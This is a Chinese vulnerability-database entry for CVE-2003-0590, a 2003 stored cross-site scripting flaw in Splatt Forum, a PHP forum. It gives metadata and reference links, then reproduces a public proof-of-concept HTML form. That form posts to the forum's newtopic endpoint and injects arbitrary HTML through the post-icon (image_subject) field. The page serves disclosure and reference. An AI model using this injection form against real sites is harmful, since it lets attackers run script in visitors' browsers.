Splatt Forum跨站脚本漏洞

Splatt Forum跨站脚本漏洞

漏洞ID 1107415 漏洞类型 跨站脚本
发布时间 2003-07-15 更新时间 2003-08-18
图片[1]-Splatt Forum跨站脚本漏洞-安全小百科CVE编号 CVE-2003-0590
图片[2]-Splatt Forum跨站脚本漏洞-安全小百科CNNVD-ID CNNVD-200308-103
漏洞平台 PHP CVSS评分 7.1
|漏洞来源
https://www.exploit-db.com/exploits/22910
https://www.securityfocus.com/bid/82760
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-103
|漏洞详情
SplattForum存在跨站脚本(XSS)漏洞。远程攻击者可以借助张贴图标(image_subject)字段插入任意HTML和web脚本。
|漏洞EXP
source: http://www.securityfocus.com/bid/8198/info

Splatt Forum has been reported prone to a HTML injection vulnerability.

An attacker may save a Splatt Forum post form, and modify it so that the post icon value contains arbitrary attacker supplied HTML code. As a result, a malicious user may have the ability to submit a post to the site containing embedded script code. This code would be executed by a user's browser in the context of the vulnerable site. 

<html>
<body>
<script>
<!-- Modify here -->
var address='http://www.splatt.it/gate.html?mop=modload&name=Forums&file=newtopic';
</script>

<!-- Exploit form -->
<script>
document.write("<form action="+address+" method='post' name='coolsus'>");
</script>
Numero forum: <input type=text name=forum value=1 size=3><br>
Username: <input CLASS=textbox TYPE="TEXT" NAME="username" SIZE="25" MAXLENGTH="40"><br>
Password: <input CLASS=textbox TYPE="PASSWORD" NAME="password" SIZE="25" MAXLENGTH="25"><br>
Soggetto: <input CLASS=textbox TYPE="TEXT" NAME="subject" SIZE="75" MAXLENGTH="75"><br>
Messaggio:<br><textarea name="message" rows="10" cols="75" wrap="VIRTUAL"></textarea><br>
<input type=hidden name=bbcode value=0>
<input type=hidden name=smile value=0>
<input type=hidden name=notify value=0>
<b>Inject code:</b> <input type=text name=image_subject value='icon1.gif">HTML CODE<!-- "' size=100><br>
<input type="submit" name="submit" value=Invia class="Button">
</form>
</body>
</html>
|受影响的产品
Splatt Splatt Forum 0
|参考资料

来源:members.fortunecity.it
链接:http://members.fortunecity.it/lethalman2002/bugs/splatt.html
来源:BUGTRAQ
名称:20030715SplattForumhtmlinjectioncodeinposticon
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105830019209609&w;=2
来源:BUGTRAQ
名称:20030715SplattForumhtmlinjectioncodeinposticon
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105830019209609&w;=2

相关推荐: Apple QuickTime/Darwin Streaming Server Remote File Existence Revealing Vulnerability

Apple QuickTime/Darwin Streaming Server Remote File Existence Revealing Vulnerability 漏洞ID 1100709 漏洞类型 Design Error 发布时间 2003-02-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享